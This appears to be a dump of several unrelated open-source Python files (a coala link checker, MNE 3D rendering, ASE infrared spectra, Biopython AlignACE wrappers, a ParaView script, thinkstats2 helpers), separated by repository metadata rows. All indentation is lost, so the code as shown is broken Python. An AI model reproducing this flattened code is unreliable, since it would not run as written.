AUTHORS = {'The coala developers'}
AUTHORS_EMAILS = {'coala-devel@googlegroups.com'}
LICENSE = 'AGPL-3.0'
CAN_DETECT = {'Documentation'}
# IP Address of www.google.com
check_connection_url = "http://216.58.218.174"
@classmethod
def check_prerequisites(cls):
code = cls.get_status_code(
cls.check_connection_url, cls.DEFAULT_TIMEOUT)
return ("You are not connected to the internet."
if code is None else True)
@staticmethod
def get_status_code(url, timeout):
try:
code = requests.head(url, allow_redirects=False,
timeout=timeout).status_code
return code
except requests.exceptions.RequestException:
pass
@staticmethod
def find_links_in_file(file, timeout, link_ignore_regex):
link_ignore_regex = re.compile(link_ignore_regex)
regex = re.compile(
r'(https?://[^.:%\s_/?#[\]@\\]+\.(?:[^\s()%\'"`<>|\\]+|'
r'\([^\s()%\'"`<>|\\]*\))*)(?<!\.)(?<!,)')
for line_number, line in enumerate(file):
match = regex.search(line)
if match:
link = match.group()
if not link_ignore_regex.search(link):
code = InvalidLinkBear.get_status_code(link, timeout)
yield line_number + 1, link, code
@deprecate_settings(link_ignore_regex='ignore_regex')
def run(self, filename, file,
timeout: int=DEFAULT_TIMEOUT,
link_ignore_regex: str="([.\/]example\.com|\{|\$)",
follow_redirects: bool=False):
"""
Find links in any text file and check if they are valid.
A link is considered valid if the server responds with a 2xx code.
This bear can automatically fix redirects, but ignores redirect
URLs that have a huge difference with the original URL.
Warning: This bear will make HEAD requests to all URLs mentioned in
your codebase, which can potentially be destructive. As an example,
this bear would naively just visit the URL from a line that goes like
`do_not_ever_open = 'https://api.acme.inc/delete-all-data'` wiping out
all your data.
:param timeout: Request timeout period.
:param link_ignore_regex: A regex for urls to ignore.
:param follow_redirects: Set to true to autocorrect redirects.
"""
for line_number, link, code in InvalidLinkBear.find_links_in_file(
file, timeout, link_ignore_regex):
if code is None:
yield Result.from_values(
origin=self,
message=('Broken link - unable to connect to '
'{url}').format(url=link),
file=filename,
line=line_number,
severity=RESULT_SEVERITY.MAJOR)
elif not 200 <= code < 300:
# HTTP status 404, 410 or 50x
if code in (404, 410) or 500 <= code < 600:
yield Result.from_values(
origin=self,
message=('Broken link - unable to connect to {url} '
'(HTTP Error: {code})'
).format(url=link, code=code),
file=filename,
line=line_number,
severity=RESULT_SEVERITY.NORMAL)
if follow_redirects and 300 <= code < 400: # HTTP status 30x
redirect_url = requests.head(link,
allow_redirects=True).url
matcher = SequenceMatcher(
None, redirect_url, link)
if (matcher.real_quick_ratio() > 0.7 and
matcher.ratio()) > 0.7:
diff = Diff(file)
current_line = file[line_number - 1]
start = current_line.find(link)
end = start + len(link)
replacement = current_line[:start] + \
redirect_url + current_line[end:]
diff.change_line(line_number,
current_line,
replacement)
yield Result.from_values(
self,
'This link redirects to ' + redirect_url,
diffs={filename: diff},
file=filename,
line=line_number,
severity=RESULT_SEVERITY.NORMAL)
|
dosarudaniel/coala-bears
|
bears/general/InvalidLinkBear.py
|
Python
|
agpl-3.0
| 5,280
|
[
"VisIt"
] |
854d19145de840d6ad029d6e49fc9b8bb92fd84b703e3ba72e226ee7c13cdd1b
|
"""Core visualization operations."""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Eric Larson <larson.eric.d@gmail.com>
# Joan Massich <mailsik@gmail.com>
# Guillaume Favelier <guillaume.favelier@gmail.com>
#
# License: Simplified BSD
import sys
import os
from contextlib import contextmanager
import importlib
from ._utils import VALID_3D_BACKENDS
from ...utils import (logger, verbose, get_config, _check_option,
_require_version, fill_doc, _validate_type)
MNE_3D_BACKEND = None
MNE_3D_BACKEND_TESTING = False
MNE_3D_BACKEND_INTERACTIVE = False
_backend_name_map = dict(
mayavi='._pysurfer_mayavi',
pyvistaqt='._qt',
notebook='._notebook',
)
backend = None
def _reload_backend(backend_name):
global backend
backend = importlib.import_module(name=_backend_name_map[backend_name],
package='mne.viz.backends')
logger.info('Using %s 3d backend.\n' % backend_name)
def _get_renderer(*args, **kwargs):
_get_3d_backend()
return backend._Renderer(*args, **kwargs)
def _check_3d_backend_name(backend_name):
_validate_type(backend_name, str, 'backend_name')
backend_name = 'pyvistaqt' if backend_name == 'pyvista' else backend_name
_check_option('backend_name', backend_name, VALID_3D_BACKENDS)
return backend_name
@verbose
def set_3d_backend(backend_name, verbose=None):
"""Set the 3D backend for MNE.
The backend will be set as specified and operations will use
that backend.
Parameters
----------
backend_name : str
The 3d backend to select. See Notes for the capabilities of each
backend (``'pyvistaqt'``, ``'notebook'``, and ``'mayavi'``).
.. versionchanged:: 0.24
The ``'pyvista'`` backend was renamed ``'pyvistaqt'``.
%(verbose)s
Returns
-------
old_backend_name : str | None
The old backend that was in use.
Notes
-----
To use PyVista, set ``backend_name`` to ``pyvistaqt`` but the value
``pyvista`` is still supported for backward compatibility.
This table shows the capabilities of each backend ("✓" for full support,
and "-" for partial support):
.. table::
:widths: auto
+--------------------------------------+--------+-----------+----------+
| **3D function:** | mayavi | pyvistaqt | notebook |
+======================================+========+===========+==========+
| :func:`plot_vector_source_estimates` | ✓ | ✓ | ✓ |
+--------------------------------------+--------+-----------+----------+
| :func:`plot_source_estimates` | ✓ | ✓ | ✓ |
+--------------------------------------+--------+-----------+----------+
| :func:`plot_alignment` | ✓ | ✓ | ✓ |
+--------------------------------------+--------+-----------+----------+
| :func:`plot_sparse_source_estimates` | ✓ | ✓ | ✓ |
+--------------------------------------+--------+-----------+----------+
| :func:`plot_evoked_field` | ✓ | ✓ | ✓ |
+--------------------------------------+--------+-----------+----------+
| :func:`plot_sensors_connectivity` | ✓ | ✓ | ✓ |
+--------------------------------------+--------+-----------+----------+
| :func:`snapshot_brain_montage` | ✓ | ✓ | ✓ |
+--------------------------------------+--------+-----------+----------+
| :func:`link_brains` | | ✓ | |
+--------------------------------------+--------+-----------+----------+
+--------------------------------------+--------+-----------+----------+
| **Feature:** |
+--------------------------------------+--------+-----------+----------+
| Large data | ✓ | ✓ | ✓ |
+--------------------------------------+--------+-----------+----------+
| Opacity/transparency | ✓ | ✓ | ✓ |
+--------------------------------------+--------+-----------+----------+
| Support geometric glyph | ✓ | ✓ | ✓ |
+--------------------------------------+--------+-----------+----------+
| Smooth shading | ✓ | ✓ | ✓ |
+--------------------------------------+--------+-----------+----------+
| Subplotting | ✓ | ✓ | ✓ |
+--------------------------------------+--------+-----------+----------+
| Inline plot in Jupyter Notebook | ✓ | | ✓ |
+--------------------------------------+--------+-----------+----------+
| Inline plot in JupyterLab | ✓ | | ✓ |
+--------------------------------------+--------+-----------+----------+
| Inline plot in Google Colab | | | |
+--------------------------------------+--------+-----------+----------+
| Toolbar | | ✓ | ✓ |
+--------------------------------------+--------+-----------+----------+
"""
global MNE_3D_BACKEND
old_backend_name = MNE_3D_BACKEND
backend_name = _check_3d_backend_name(backend_name)
if MNE_3D_BACKEND != backend_name:
_reload_backend(backend_name)
MNE_3D_BACKEND = backend_name
# Qt5 macOS 11 compatibility
if sys.platform == 'darwin' and 'QT_MAC_WANTS_LAYER' not in os.environ:
os.environ['QT_MAC_WANTS_LAYER'] = '1'
return old_backend_name
def get_3d_backend():
"""Return the 3D backend currently used.
Returns
-------
backend_used : str | None
The 3d backend currently in use. If no backend is found,
returns ``None``.
.. versionchanged:: 0.24
The ``'pyvista'`` backend has been renamed ``'pyvistaqt'``, so
``'pyvista'`` is no longer returned by this function.
"""
try:
backend = _get_3d_backend()
except RuntimeError as exc:
backend = None
logger.info(str(exc))
return backend
def _get_3d_backend():
"""Load and return the current 3d backend."""
global MNE_3D_BACKEND
if MNE_3D_BACKEND is None:
MNE_3D_BACKEND = get_config(key='MNE_3D_BACKEND', default=None)
if MNE_3D_BACKEND is None: # try them in order
errors = dict()
for name in VALID_3D_BACKENDS:
try:
_reload_backend(name)
except ImportError as exc:
errors[name] = str(exc)
else:
MNE_3D_BACKEND = name
break
else:
raise RuntimeError(
'Could not load any valid 3D backend:\n' +
"\n".join(f'{key}: {val}' for key, val in errors.items()))
else:
MNE_3D_BACKEND = _check_3d_backend_name(MNE_3D_BACKEND)
_reload_backend(MNE_3D_BACKEND)
MNE_3D_BACKEND = _check_3d_backend_name(MNE_3D_BACKEND)
return MNE_3D_BACKEND
@contextmanager
def use_3d_backend(backend_name):
"""Create a 3d visualization context using the designated backend.
See :func:`mne.viz.set_3d_backend` for more details on the available
3d backends and their capabilities.
Parameters
----------
backend_name : {'mayavi', 'pyvistaqt', 'notebook'}
The 3d backend to use in the context.
"""
old_backend = set_3d_backend(backend_name)
try:
yield
finally:
if old_backend is not None:
try:
set_3d_backend(old_backend)
except Exception:
pass
@contextmanager
def _use_test_3d_backend(backend_name, interactive=False):
"""Create a testing viz context.
Parameters
----------
backend_name : str
The 3d backend to use in the context.
interactive : bool
If True, ensure interactive elements are accessible.
"""
with _actors_invisible():
with use_3d_backend(backend_name):
with backend._testing_context(interactive):
yield
@contextmanager
def _actors_invisible():
global MNE_3D_BACKEND_TESTING
orig_testing = MNE_3D_BACKEND_TESTING
MNE_3D_BACKEND_TESTING = True
try:
yield
finally:
MNE_3D_BACKEND_TESTING = orig_testing
@fill_doc
def set_3d_view(figure, azimuth=None, elevation=None,
focalpoint=None, distance=None, roll=None,
reset_camera=True):
"""Configure the view of the given scene.
Parameters
----------
figure : object
The scene which is modified.
%(azimuth)s
%(elevation)s
%(focalpoint)s
%(distance)s
%(roll)s
reset_camera : bool
If True, reset the camera properties beforehand.
"""
backend._set_3d_view(figure=figure, azimuth=azimuth,
elevation=elevation, focalpoint=focalpoint,
distance=distance, roll=roll,
reset_camera=reset_camera)
def set_3d_title(figure, title, size=40):
"""Configure the title of the given scene.
Parameters
----------
figure : object
The scene which is modified.
title : str
The title of the scene.
size : int
The size of the title.
"""
backend._set_3d_title(figure=figure, title=title, size=size)
def create_3d_figure(size, bgcolor=(0, 0, 0), smooth_shading=True,
handle=None, scene=True):
"""Return an empty figure based on the current 3d backend.
.. warning:: Proceed with caution when the renderer object is
returned (with ``scene=False``) because the _Renderer
API is not necessarily stable enough for production,
it's still actively in development.
Parameters
----------
size : tuple
The dimensions of the 3d figure (width, height).
bgcolor : tuple
The color of the background.
smooth_shading : bool
If True, smooth shading is enabled. Defaults to True.
handle : int | None
The figure identifier.
scene : bool
Specify if the returned object is the scene. If False,
the renderer object is returned. Defaults to True.
Returns
-------
figure : object
The requested empty scene or the renderer object if
``scene=False``.
"""
renderer = _get_renderer(
fig=handle,
size=size,
bgcolor=bgcolor,
smooth_shading=smooth_shading,
)
if scene:
return renderer.scene()
else:
return renderer
def get_brain_class():
"""Return the proper Brain class based on the current 3d backend.
Returns
-------
brain : object
The Brain class corresponding to the current 3d backend.
"""
if get_3d_backend() == "mayavi":
from surfer import Brain
_require_version('surfer', 'stc.plot', '0.9')
else: # PyVista
from ...viz._brain import Brain
return Brain
|
pravsripad/mne-python
|
mne/viz/backends/renderer.py
|
Python
|
bsd-3-clause
| 11,507
|
[
"Mayavi"
] |
b8491dd2b7cdc1f7411b3b8652816ac25faa8f427705a862a86ba6ebfc873023
|
# -*- coding: utf-8 -*-
"""Infrared intensities"""
import pickle
from math import sin, pi, sqrt, exp, log
from os import remove
from os.path import isfile
import numpy as np
import ase.units as units
from ase.io.trajectory import PickleTrajectory
from ase.parallel import rank, barrier
from ase.vibrations import Vibrations
class InfraRed(Vibrations):
"""Class for calculating vibrational modes and infrared intensities
using finite difference.
The vibrational modes are calculated from a finite difference
approximation of the Dynamical matrix and the IR intensities from
a finite difference approximation of the gradient of the dipole
moment. The method is described in:
D. Porezag, M. R. Peterson:
"Infrared intensities and Raman-scattering activities within
density-functional theory",
Phys. Rev. B 54, 7830 (1996)
The calculator object (calc) linked to the Atoms object (atoms) must
have the attribute:
>>> calc.get_dipole_moment(atoms)
In addition to the methods included in the ``Vibrations`` class
the ``InfraRed`` class introduces two new methods;
*get_spectrum()* and *write_spectra()*. The *summary()*, *get_energies()*,
*get_frequencies()*, *get_spectrum()* and *write_spectra()*
methods all take an optional *method* keyword. Use
method='Frederiksen' to use the method described in:
T. Frederiksen, M. Paulsson, M. Brandbyge, A. P. Jauho:
"Inelastic transport theory from first-principles: methodology
and applications for nanoscale devices",
Phys. Rev. B 75, 205413 (2007)
atoms: Atoms object
The atoms to work on.
indices: list of int
List of indices of atoms to vibrate. Default behavior is
to vibrate all atoms.
name: str
Name to use for files.
delta: float
Magnitude of displacements.
nfree: int
Number of displacements per degree of freedom, 2 or 4 are
supported. Default is 2 which will displace each atom +delta
and -delta in each cartesian direction.
directions: list of int
Cartesian coordinates to calculate the gradient of the dipole moment in.
For example directions = 2 only dipole moment in the z-direction will
be considered, whereas for directions = [0, 1] only the dipole
moment in the xy-plane will be considered. Default behavior is to
use the dipole moment in all directions.
Example:
>>> from ase import *
>>> from ase.infrared import InfraRed
>>> water = read('water.traj') # read pre-relaxed structure of water molecule
>>> calc = Vasp(prec='Accurate',
... ediff=1E-8,
... isym=0,
... idipol=4, # calculate the total dipole moment
... dipol=water.get_center_of_mass(scaled=True),
... ldipol=True)
>>> water.set_calculator(calc)
>>> ir = InfraRed(water)
>>> ir.run()
>>> ir.summary()
-------------------------------------
Mode Frequency Intensity
# meV cm^-1 (D/Å)^2 amu^-1
-------------------------------------
0 16.9i 136.2i 1.6108
1 10.5i 84.9i 2.1682
2 5.1i 41.1i 1.7327
3 0.3i 2.2i 0.0080
4 2.4 19.0 0.1186
5 15.3 123.5 1.4956
6 195.5 1576.7 1.6437
7 458.9 3701.3 0.0284
8 473.0 3814.6 1.1812
-------------------------------------
Zero-point energy: 0.573 eV
Static dipole moment: 1.833 D
Maximum force on atom in `eqiulibrium`: 0.0026 eV/Å
"""
def __init__(self, atoms, indices=None, name='ir', delta=0.01, nfree=2, directions=None):
assert nfree in [2, 4]
self.atoms = atoms
if atoms.constraints:
print "WARNING! \n Your Atoms object is constrained. Some forces may be unintended set to zero. \n"
self.calc = atoms.get_calculator()
if indices is None:
indices = range(len(atoms))
self.indices = np.asarray(indices)
self.nfree = nfree
self.name = name+'-d%.3f' % delta
self.delta = delta
self.H = None
if directions is None:
self.directions = np.asarray([0, 1, 2])
else:
self.directions = np.asarray(directions)
self.ir = True
def read(self, method='standard', direction='central'):
self.method = method.lower()
self.direction = direction.lower()
assert self.method in ['standard', 'frederiksen']
if direction != 'central':
raise NotImplementedError('Only central difference is implemented at the moment.')
# Get "static" dipole moment and forces
name = '%s.eq.pckl' % self.name
[forces_zero, dipole_zero] = pickle.load(open(name))
self.dipole_zero = (sum(dipole_zero**2)**0.5)*units.Debye
self.force_zero = max([sum((forces_zero[j])**2)**0.5 for j in self.indices])
ndof = 3 * len(self.indices)
H = np.empty((ndof, ndof))
dpdx = np.empty((ndof, 3))
r = 0
for a in self.indices:
for i in 'xyz':
name = '%s.%d%s' % (self.name, a, i)
[fminus, dminus] = pickle.load(open(name + '-.pckl'))
[fplus, dplus] = pickle.load(open(name + '+.pckl'))
if self.nfree == 4:
[fminusminus, dminusminus] = pickle.load(open(name + '--.pckl'))
[fplusplus, dplusplus] = pickle.load(open(name + '++.pckl'))
if self.method == 'frederiksen':
fminus[a] += -fminus.sum(0)
fplus[a] += -fplus.sum(0)
if self.nfree == 4:
fminusminus[a] += -fminus.sum(0)
fplusplus[a] += -fplus.sum(0)
if self.nfree == 2:
H[r] = (fminus - fplus)[self.indices].ravel() / 2.0
dpdx[r] = (dminus - dplus)
if self.nfree == 4:
H[r] = (-fminusminus+8*fminus-8*fplus+fplusplus)[self.indices].ravel() / 12.0
dpdx[r] = (-dplusplus + 8*dplus - 8*dminus +dminusminus) / 6.0
H[r] /= 2 * self.delta
dpdx[r] /= 2 * self.delta
for n in range(3):
if n not in self.directions:
dpdx[r][n] = 0
dpdx[r][n] = 0
r += 1
# Calculate eigenfrequencies and eigenvectors
m = self.atoms.get_masses()
H += H.copy().T
self.H = H
m = self.atoms.get_masses()
self.im = np.repeat(m[self.indices]**-0.5, 3)
omega2, modes = np.linalg.eigh(self.im[:, None] * H * self.im)
self.modes = modes.T.copy()
# Calculate intensities
dpdq = np.array([dpdx[j]/sqrt(m[self.indices[j/3]]*units._amu/units._me) for j in range(ndof)])
dpdQ = np.dot(dpdq.T, modes)
dpdQ = dpdQ.T
intensities = np.array([sum(dpdQ[j]**2) for j in range(ndof)])
# Conversion factor:
s = units._hbar * 1e10 / sqrt(units._e * units._amu)
self.hnu = s * omega2.astype(complex)**0.5
# Conversion factor from atomic units to (D/Angstrom)^2/amu.
conv = units.Debye**2*units._amu/units._me
self.intensities = intensities*conv
def summary(self, method='standard', direction='central'):
hnu = self.get_energies(method, direction)
s = 0.01 * units._e / units._c / units._hplanck
print '-------------------------------------'
print ' Mode Frequency Intensity'
print ' # meV cm^-1 (D/Å)^2 amu^-1'
print '-------------------------------------'
for n, e in enumerate(hnu):
if e.imag != 0:
c = 'i'
e = e.imag
else:
c = ' '
print '%3d %6.1f%s %7.1f%s %9.4f' % (n, 1000 * e, c, s * e, c, self.intensities[n])
print '-------------------------------------'
print 'Zero-point energy: %.3f eV' % self.get_zero_point_energy()
print 'Static dipole moment: %.3f D' % self.dipole_zero
print 'Maximum force on atom in `eqiulibrium`: %.4f eV/Å' % self.force_zero
print
def get_spectrum(self, start=800, end=4000, npts=None, width=4, type='Gaussian', method='standard', direction='central'):
"""Get infrared spectrum.
The method returns wavenumbers in cm^-1 with corresonding absolute infrared intensity.
Start and end point, and width of the Gaussian/Lorentzian should be given in cm^-1."""
self.type = type.lower()
assert self.type in ['gaussian', 'lorentzian']
if not npts:
npts = (end-start)/width*10+1
frequencies = self.get_frequencies(method, direction).real
intensities=self.intensities
if type == 'lorentzian':
intensities = intensities*width*pi/2.
else:
sigma = width/2./sqrt(2.*log(2.))
#Make array with spectrum data
spectrum = np.empty(npts,np.float)
energies = np.empty(npts,np.float)
ediff = (end-start)/float(npts-1)
energies = np.arange(start, end+ediff, ediff)
for i, energy in enumerate(energies):
energies[i] = energy
if type == 'lorentzian':
spectrum[i] = (intensities*0.5*width/pi/((frequencies-energy)**2+0.25*width**2)).sum()
else:
spectrum[i] = (intensities*np.exp(-(frequencies - energy)**2/2./sigma**2)).sum()
return [energies, spectrum]
def write_spectra(self, out='ir-spectra.dat', start=800, end=4000, npts=None, width=10, type='Gaussian', method='standard', direction='central'):
"""Write out infrared spectrum to file.
First column is the wavenumber in cm^-1, the second column the absolute infrared intensities, and
the third column the absorbance scaled so that data runs from 1 to 0. Start and end
point, and width of the Gaussian/Lorentzian should be given in cm^-1."""
energies, spectrum = self.get_spectrum(start, end, npts, width, type, method, direction)
#Write out spectrum in file. First column is absolute intensities.
#Second column is absorbance scaled so that data runs from 1 to 0
spectrum2 = 1. - spectrum/spectrum.max()
outdata = np.empty([len(energies), 3])
outdata.T[0] = energies
outdata.T[1] = spectrum
outdata.T[2] = spectrum2
fd = open(out, 'w')
for row in outdata:
fd.write('%.3f %15.5e %15.5e \n' % (row[0], row[1], row[2]) )
fd.close()
#np.savetxt(out, outdata, fmt='%.3f %15.5e %15.5e')
|
freephys/python_ase
|
ase/infrared.py
|
Python
|
gpl-3.0
| 10,849
|
[
"ASE",
"Gaussian",
"VASP"
] |
1051246c073a796b3cc53ec9facc46911dd62749a3daecc6c3fa37845f2bfc3b
|
# Copyright 2003-2009 by Bartek Wilczynski. All rights reserved.
# Revisions copyright 2009 by Peter Cock.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""This module provides code to work with the standalone version of AlignACE,
for motif search in DNA sequences.
AlignACE homepage:
http://arep.med.harvard.edu/mrnadata/mrnasoft.html
AlignACE Citations:
Computational identification of cis-regulatory elements associated with
groups of functionally related genes in Saccharomyces cerevisiae,
Hughes, JD, Estep, PW, Tavazoie S, & GM Church, Journal of Molecular
Biology 2000 Mar 10;296(5):1205-14.
Finding DNA Regulatory Motifs within Unaligned Non-Coding Sequences
Clustered by Whole-Genome mRNA Quantitation,
Roth, FR, Hughes, JD, Estep, PE & GM Church, Nature Biotechnology
1998 Oct;16(10):939-45.
"""
from __future__ import print_function
from Bio.Application import AbstractCommandline, _Option, _Argument
import warnings
from Bio import BiopythonDeprecationWarning
class AlignAceCommandline(AbstractCommandline):
"""Create a commandline for the AlignAce program (DEPRECATED).
Example:
>>> from Bio.motifs.applications import AlignAceCommandline
>>> in_file = "sequences.fasta"
>>> alignace_cline = AlignAceCommandline(infile=in_file, gcback=0.55)
>>> print(alignace_cline)
AlignACE -i sequences.fasta -gcback 0.55
You would typically run the command line with alignace_cline() or via
the Python subprocess module, as described in the Biopython tutorial.
"""
def __init__(self, cmd="AlignACE", **kwargs):
warnings.warn("""The AlignACE application wrapper is deprecated and
is likely to be removed in a future release of Biopython,
since an up to date version of the AlignACE software
cannot be obtained anymore. If you have a copy of
AlignACE 4, please consider contacting the Biopython
developers.""", BiopythonDeprecationWarning)
self.parameters = \
[
_Option(["-i", "infile"],
"Input Sequence file in FASTA format.",
checker_function=lambda x: isinstance(x, str),
equate=False,
filename=True),
_Option(["-numcols", "numcols"],
"Number of columns to align",
equate=False,
checker_function=lambda x: isinstance(x, int)),
_Option(["-expect", "expect"],
"number of sites expected in model",
equate=False,
checker_function=lambda x: isinstance(x, int)),
_Option(["-gcback", "gcback"],
"background fractional GC content of input sequence",
equate=False,
checker_function=lambda x: isinstance(x, float)),
_Option(["-minpass", "minpass"],
"minimum number of non-improved passes in phase 1",
equate=False,
checker_function=lambda x: isinstance(x, int)),
_Option(["-seed", "seed"],
"set seed for random number generator (time)",
equate=False,
checker_function=lambda x: isinstance(x, int)),
_Option(["-undersample", "undersample"],
"possible sites / (expect * numcols * seedings)",
equate=False,
checker_function=lambda x: isinstance(x, int)),
_Option(["-oversample", "oversample"],
"1/undersample",
equate=False,
checker_function=lambda x: isinstance(x, int)),
]
AbstractCommandline.__init__(self, cmd, **kwargs)
class CompareAceCommandline(AbstractCommandline):
"""Create a commandline for the CompareAce program.
Example:
>>> from Bio.motifs.applications import CompareAceCommandline
>>> m1_file = "sequences1.fasta"
>>> m2_file = "sequences2.fasta"
>>> compareace_cline = CompareAceCommandline(motif1=m1_file, motif2=m2_file)
>>> print(compareace_cline)
CompareACE sequences1.fasta sequences2.fasta
You would typically run the command line with compareace_cline() or via
the Python subprocess module, as described in the Biopython tutorial.
"""
def __init__(self, cmd="CompareACE", **kwargs):
warnings.warn("""The CompareACE application wrapper is deprecated and
is likely to be removed in a future release of Biopython,
since an up to date version of the AlignACE software
cannot be obtained anymore. If you have a copy of
AlignACE 4, please consider contacting the Biopython
developers.""", BiopythonDeprecationWarning)
self.parameters = \
[
_Argument(["motif1"],
"name of file containing motif 1",
checker_function=lambda x: isinstance(x, str),
filename=True),
_Argument(["motif2"],
"name of file containing motif 2",
checker_function=lambda x: isinstance(x, str),
filename=True),
]
AbstractCommandline.__init__(self, cmd, **kwargs)
def _test():
"""Run the module's doctests (PRIVATE)."""
print("Running alignace doctests...")
import doctest
doctest.testmod()
print("Done")
if __name__ == "__main__":
_test()
|
Ambuj-UF/ConCat-1.0
|
src/Utils/Bio/motifs/applications/_alignace.py
|
Python
|
gpl-2.0
| 5,755
|
[
"Biopython"
] |
47f28d70c74da1156ea74c99d7692ffd7d1e4ac43428cd0a65d0dfea3c27b290
|
try: paraview.simple
except: from paraview.simple import *
def RequestDataDescription(datadescription):
"Callback to populate the request for current timestep"
if datadescription.GetForceOutput() == True:
for i in range(datadescription.GetNumberOfInputDescriptions()):
datadescription.GetInputDescription(i).AllFieldsOn()
datadescription.GetInputDescription(i).GenerateMeshOn()
return
timestep = datadescription.GetTimeStep()
input_name = 'input'
if (timestep % 1 == 0) :
datadescription.GetInputDescriptionByName(input_name).AllFieldsOn()
datadescription.GetInputDescriptionByName(input_name).GenerateMeshOn()
else:
datadescription.GetInputDescriptionByName(input_name).AllFieldsOff()
datadescription.GetInputDescriptionByName(input_name).GenerateMeshOff()
def DoCoProcessing(datadescription):
"Callback to do co-processing for current timestep"
cp_writers = []
cp_views = []
timestep = datadescription.GetTimeStep()
u10000001_datbin = CreateProducer( datadescription, "input" )
ParallelImageDataWriter1 = CreateWriter( XMLPImageDataWriter, "filename_%t.pvti", 1, cp_writers )
for writer in cp_writers:
if timestep % writer.cpFrequency == 0 or datadescription.GetForceOutput() == True:
writer.FileName = writer.cpFileName.replace("%t", str(timestep))
writer.UpdatePipeline()
if False : # rescale data range
import math
for view in cp_views:
if timestep % view.cpFrequency == 0 or datadescription.GetForceOutput() == True:
reps = view.Representations
for rep in reps:
if hasattr(rep, 'Visibility') and rep.Visibility == 1 and hasattr(rep, 'MapScalars') and rep.MapScalars != '':
input = rep.Input
input.UpdatePipeline() #make sure range is up-to-date
lut = rep.LookupTable
if lut == None:
continue
if rep.ColorAttributeType == 'POINT_DATA':
datainformation = input.GetPointDataInformation()
elif rep.ColorAttributeType == 'CELL_DATA':
datainformation = input.GetCellDataInformation()
else:
print 'something strange with color attribute type', rep.ColorAttributeType
if lut.VectorMode != 'Magnitude' or datainformation.GetArray(rep.ColorArrayName).GetNumberOfComponents() == 1:
datarange = datainformation.GetArray(rep.ColorArrayName).GetRange(lut.VectorComponent)
else:
datarange = [0,0]
for i in range(datainformation.GetArray(rep.ColorArrayName).GetNumberOfComponents()):
for j in range(2):
datarange[j] += datainformation.GetArray(rep.ColorArrayName).GetRange(i)[j]*datainformation.GetArray(rep.ColorArrayName).GetRange(i)[j]
datarange[0] = math.sqrt(datarange[0])
datarange[1] = math.sqrt(datarange[1])
rgbpoints = lut.RGBPoints.GetData()
numpts = len(rgbpoints)/4
minvalue = min(datarange[0], rgbpoints[0])
maxvalue = max(datarange[1], rgbpoints[(numpts-1)*4])
if minvalue != rgbpoints[0] or maxvalue != rgbpoints[(numpts-1)*4]:
# rescale all of the points
oldrange = rgbpoints[(numpts-1)*4] - rgbpoints[0]
newrange = maxvalue - minvalue
newrgbpoints = list(rgbpoints)
for v in range(numpts):
newrgbpoints[v*4] = minvalue+(rgbpoints[v*4] - rgbpoints[0])*newrange/oldrange
lut.RGBPoints.SetData(newrgbpoints)
for view in cp_views:
if timestep % view.cpFrequency == 0 or datadescription.GetForceOutput() == True:
fname = view.cpFileName
fname = fname.replace("%t", str(timestep))
if view.cpFitToScreen != 0:
if view.IsA("vtkSMRenderViewProxy") == True:
view.ResetCamera()
elif view.IsA("vtkSMContextViewProxy") == True:
view.ResetDisplay()
else:
print ' do not know what to do with a ', view.GetClassName()
WriteImage(fname, view, Magnification=view.cpMagnification)
# explicitly delete the proxies -- we do it this way to avoid problems with prototypes
tobedeleted = GetNextProxyToDelete()
while tobedeleted != None:
Delete(tobedeleted)
tobedeleted = GetNextProxyToDelete()
def GetNextProxyToDelete():
proxyiterator = servermanager.ProxyIterator()
for proxy in proxyiterator:
group = proxyiterator.GetGroup()
if group.find("prototypes") != -1:
continue
if group != 'timekeeper' and group.find("pq_helper_proxies") == -1 :
return proxy
return None
def CreateProducer(datadescription, gridname):
"Creates a producer proxy for the grid"
if not datadescription.GetInputDescriptionByName(gridname):
raise RuntimeError, "Simulation input name '%s' does not exist" % gridname
grid = datadescription.GetInputDescriptionByName(gridname).GetGrid()
producer = PVTrivialProducer()
producer.GetClientSideObject().SetOutput(grid)
if grid.IsA("vtkImageData") == True or grid.IsA("vtkStructuredGrid") == True or grid.IsA("vtkRectilinearGrid") == True:
extent = datadescription.GetInputDescriptionByName(gridname).GetWholeExtent()
producer.WholeExtent= [ extent[0], extent[1], extent[2], extent[3], extent[4], extent[5] ]
producer.UpdatePipeline()
return producer
def CreateWriter(proxy_ctor, filename, freq, cp_writers):
writer = proxy_ctor()
writer.FileName = filename
writer.add_attribute("cpFrequency", freq)
writer.add_attribute("cpFileName", filename)
cp_writers.append(writer)
return writer
def CreateView(proxy_ctor, filename, freq, fittoscreen, magnification, cp_views):
view = proxy_ctor()
view.add_attribute("cpFileName", filename)
view.add_attribute("cpFrequency", freq)
view.add_attribute("cpFileName", filename)
view.add_attribute("cpFitToScreen", fittoscreen)
view.add_attribute("cpMagnification", magnification)
cp_views.append(view)
return view
|
openmichigan/PSNM
|
KleinGordon/Programs/KleinGordon3dMpiFFTParaView/pipeline_vtis.py
|
Python
|
bsd-2-clause
| 6,773
|
[
"ParaView"
] |
454b60b1175dc9c99c2e203e70fe10f190f1e54fefb83a610e89adcc7cbc8c6f
|
"""This file contains code for use with "Think Stats" and
"Think Bayes", both by Allen B. Downey, available from greenteapress.com
Copyright 2014 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
from __future__ import print_function, division
"""This file contains class definitions for:
Hist: represents a histogram (map from values to integer frequencies).
Pmf: represents a probability mass function (map from values to probs).
_DictWrapper: private parent class for Hist and Pmf.
Cdf: represents a discrete cumulative distribution function
Pdf: represents a continuous probability density function
"""
import bisect
import copy
import logging
import math
import random
import re
from collections import Counter
from operator import itemgetter
import thinkplot
import numpy as np
import pandas
import scipy
from scipy import stats
from scipy import special
from scipy import ndimage
from io import open
ROOT2 = math.sqrt(2)
def RandomSeed(x):
"""Initialize the random and np.random generators.
x: int seed
"""
random.seed(x)
np.random.seed(x)
def Odds(p):
"""Computes odds for a given probability.
Example: p=0.75 means 75 for and 25 against, or 3:1 odds in favor.
Note: when p=1, the formula for odds divides by zero, which is
normally undefined. But I think it is reasonable to define Odds(1)
to be infinity, so that's what this function does.
p: float 0-1
Returns: float odds
"""
if p == 1:
return float('inf')
return p / (1 - p)
def Probability(o):
"""Computes the probability corresponding to given odds.
Example: o=2 means 2:1 odds in favor, or 2/3 probability
o: float odds, strictly positive
Returns: float probability
"""
return o / (o + 1)
def Probability2(yes, no):
"""Computes the probability corresponding to given odds.
Example: yes=2, no=1 means 2:1 odds in favor, or 2/3 probability.
yes, no: int or float odds in favor
"""
return yes / (yes + no)
